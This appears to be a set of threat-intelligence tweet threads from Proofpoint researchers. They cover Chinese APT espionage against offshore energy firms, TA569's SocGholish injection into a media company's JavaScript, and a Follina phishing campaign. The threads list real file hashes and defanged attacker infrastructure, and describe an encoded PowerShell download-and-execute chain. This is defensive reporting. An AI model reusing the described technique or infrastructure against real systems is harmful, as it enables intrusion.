Researchers at @proofpoint identified RTF template injection campaigns from June 2021 - March 2022 targeting hydrocarbon exploration & offshore energy sectors just before Chinese Coast Guard intervention at key sites indicating a tie between cyber espionage & manned maritime ops.
A full technical analysis of this years-long cyber espionage operation was published earlier this year alongside talented guest author @cyberoverdrive! ow.ly/wLSW50LzmpM
Key technical & temporal correlations may indicate that Leviathan as a CN MSS contractor, may be servicing the intelligence needs of the CN Coast Guard. The 2021 CCG Law requires the CCG to patrol and prevent foreign energy operations in contested waters of the South China Sea.
Contested sovereignty claims in the South China Sea have given rise to increasing grey-zone conflict in the region, which now clearly include the support of known nation-state APT actors.
While the most prominent case of kinetic maritime support was observed in Malaysia, Leviathan also was seen targeting the supply chain of Taiwanese windfarms in March 2022.
With the global #offshoreenergy sector growing in the #SouthChinaSea and grey-zone conflict expanding, @threatinsight forecasts that known APTs will continue to conduct cyber espionage in the region in the future.
• • •
Missing some Tweet in this thread? You can try to
force a refresh
Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via #Javascript to its partners. By modifying the codebase of this otherwise benign JS, it is now used to deploy #SocGholish.
We track this actor as #TA569. TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore the presence of the payload and malicious content can vary from hour to hour and shouldn't be considered a false positive.
Proofpoint observed TA569 injects within the assets of a media company used by multiple major news orgs. More than 250 regional/national newspaper sites have accessed the malicious Javascript. The actual number of impacted hosts is known only by the impacted media company.
Proofpoint blocked a suspected state aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.
This campaign masqueraded as a salary increase and utilized an RTF (242d2fa02535599dae793e731b6db5a2) with the exploit payload downloaded from 45.76.53[.]253.
The downloaded Powershell script was base64 encoded and used Invoke-Expression to download an additional PS script (dbd2b7048b3321c87a768ed7581581db) from seller-notification[.]live.